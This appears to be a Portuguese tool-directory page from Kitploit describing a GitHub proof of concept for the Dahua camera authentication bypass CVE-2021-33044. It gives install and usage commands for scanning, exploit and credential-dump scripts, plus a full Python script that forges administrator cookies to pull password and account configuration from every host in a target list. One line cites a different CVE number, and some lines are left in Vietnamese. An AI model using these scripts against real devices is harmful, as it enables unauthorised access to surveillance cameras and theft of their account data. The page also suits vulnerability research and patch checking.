Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Camera-Dahua-Research-l-h-ng-CVE-2021-33044 — DAHUA_AUTH-BYPASS-CVE-2021-33044 | Kitploit
Ferramentas/GitHubGitHub/litndat/camera-dahua-research-l-h-ng-cve-2021-33044
Autenticação e AutorizaçãoSegurança IoTAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e EducaçãoRed Teaming

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
GitHub
litndat/camera-dahua-research-l-h-ng-cve-2021-33044

Camera-Dahua-Research-l-h-ng-CVE-2021-33044

DAHUA_AUTH-BYPASS-CVE-2021-33044

Ver Repositório
9há 2 mesesAinda não revisado

Simulação de exploração do Dahua Authentication Bypass PoC (CVE-2021-33044)

Visão geral

As câmeras IP Dahua são dispositivos IoT amplamente utilizados em sistemas de vigilância de segurança. Por serem frequentemente implantadas em redes internas ou acessadas pela Internet, as vulnerabilidades de segurança nas câmeras IP podem causar sérios impactos à privacidade e à segurança da informação.

CVE-2021-33045 é uma vulnerabilidade de segurança que existe em algumas linhas de câmeras Dahua, permitindo acesso não autorizado a recursos de configuração internos sem exigir autenticação válida. Essa vulnerabilidade decorre do mecanismo de controle de acesso pouco rígido no firmware do dispositivo.

Informações da vulnerabilidade

ItemConteúdo
CVECVE-2021-33044
TipoAuthentication Bypass
GravidadeCrítica (CVSS ~9.8)
AutenticaçãoSem necessidade de autenticação
ImpactoDahua Camera / DVR / NVR

Causa

A vulnerabilidade decorre do design de autenticação inseguro no firmware das câmeras Dahua:

  • O servidor não valida corretamente a sessão/token
  • Confia nos dados enviados pelo cliente
  • Alguns endpoints de configuração sensíveis apenas verificam a existência do cookie, não verificam a permissão de acesso real

Isso permite que o atacante:

  • falsifique o processo de autenticação
  • ignore o login completamente

Referências:

  • NVD CVE-2021-33044
  • http://seclists.org/fulldisclosure/2021/Oct/13

Como funciona o mecanismo de bypass de autenticação

Fluxo normal

root@kitploit:~
→ Client gửi HTTP request kèm cookie tùy ý
→ Camera kiểm tra cookie ở mức giao diện
→ Không xác minh session hợp lệ ở backend
→ Cho phép truy cập trực tiếp vào các endpoint cấu hình nội bộ
→ Trả về dữ liệu nhạy cảm

Cenário

Como usar

Instalação

root@kitploit:~
# Clone repository
git clone https://github.com/eagle-nett/DAHUA_AUTH-BYPASS-CVE-2021-33044.git
cd DAHUA_AUTH-BYPASS-CVE-2021-33044

pip install requests

Varredura de rede

root@kitploit:~
# Scan subnet (ports required)
python dahua_scanner.py https://example.com -p 80 8080 8800

# Single host with port
python dahua_scanner.py https://example.com

Portas Dahua comuns: 80,443, 8080, 37777, 37778

Exploração da vulnerabilidade CVE

root@kitploit:~
python dahua_exploit.py https://example.com -p 8081
python dahua_exploit.py https://example.com -c 2021-33044  #CVE
python dahua_exploit.py --help

Bypass de autenticação

root@kitploit:~
python dahua_auth_bypass.py https://example.com -p 8080
python dahua_auth_bypass.py https://example.com  # Dump thiết bị sau khi bypass

Exemplo

root@kitploit:~
#!/usr/bin/env python3
import requests, sys
requests.packages.urllib3.disable_warnings()

def dump_accounts(ip, port=80):
    base = f"http://{ip}:{port}"
    cookies = {
        "userName": "admin",
        "userLevel": "1",
        "sessionID": "00000000"
    }
    urls = [
        "/current_config/passwd",
        "/current_config/Account1",
        "/current_config/UserMgr",
        "/current_config/accounts"
    ]

    for path in urls:
        try:
            r = requests.get(
                base + path,
                cookies=cookies,
                verify=False,
                timeout=8
            )
            if r.status_code == 200 and len(r.text) > 30:
                print(f"[+] {ip}:{port}  VULNERABLE → {path}")
                return
        except:
            pass

    print(f"[-] {ip}:{port}  safe / patched")

for line in open("targets.txt"):
    t = line.strip()
    if not t or t.startswith("#"):
        continue
    ip = t.split(":")[0]
    port = int(t.split(":")[1]) if ":" in t else 80
    dump_accounts(ip, port)

Explicação

  • O script usa a biblioteca requests e desativa proativamente os avisos de SSL, usados para desabilitar os alertas de SSL

  • A função dump_accounts(ip, port=80) é a função principal responsável por verificar um dispositivo de câmera. A função principal serve para:

    • Construir a URL a partir do endereço IP e da porta
    • Simular o estado de login administrativo por meio de cookies
    • Enviar requisições para endpoints de configuração sensíveis
    • Analisar a resposta para determinar se o dispositivo está vulnerável
  • Simulação de cookie de autenticação. A função usa valores de cookie como:

    • userName=admin
    • userLevel=1
    • sessionID=00000000
  • Nas versões de câmera afetadas, o backend não verifica o sessionID real, fazendo com que o sistema acredite que a requisição foi enviada por uma conta administrativa válida.

Loop de processamento da lista de alvos

O script lê a lista de alvos de um arquivo de entrada e chama a função de verificação para cada dispositivo, um por um. Essa abordagem permite avaliar várias câmeras de forma automatizada.

imagem

Processo de desenvolvimento

Estes scripts foram desenvolvidos com base em:

  • Detalhes de CVE publicados pela NVD
  • Avisos de segurança da Dahua
  • Referências públicas de PoC (seclists.org, packetstormsecurity)

Status dos testes:

  • A lógica de bypass de autenticação foi implementada de acordo com a especificação da CVE
  • Testes limitados em dispositivos vulneráveis.

Nota

Este projeto:

  • Destina-se apenas a fins educacionais e de pesquisa
  • Execute em um ambiente de laboratório pessoal
Baixar ferramenta
ArquivoObjetivoCVEs
dahua_scanner.pyDescoberta de rede — encontra câmeras Dahua na sub-redeDetecção
dahua_exploit.pyFerramenta de varredura Multi-CVE — verifica todas as vulnerabilidades de segurança.Todas
dahua_auth_bypass.pyBypass de autenticação dedicado com a opção --dumpCVE-2021-33044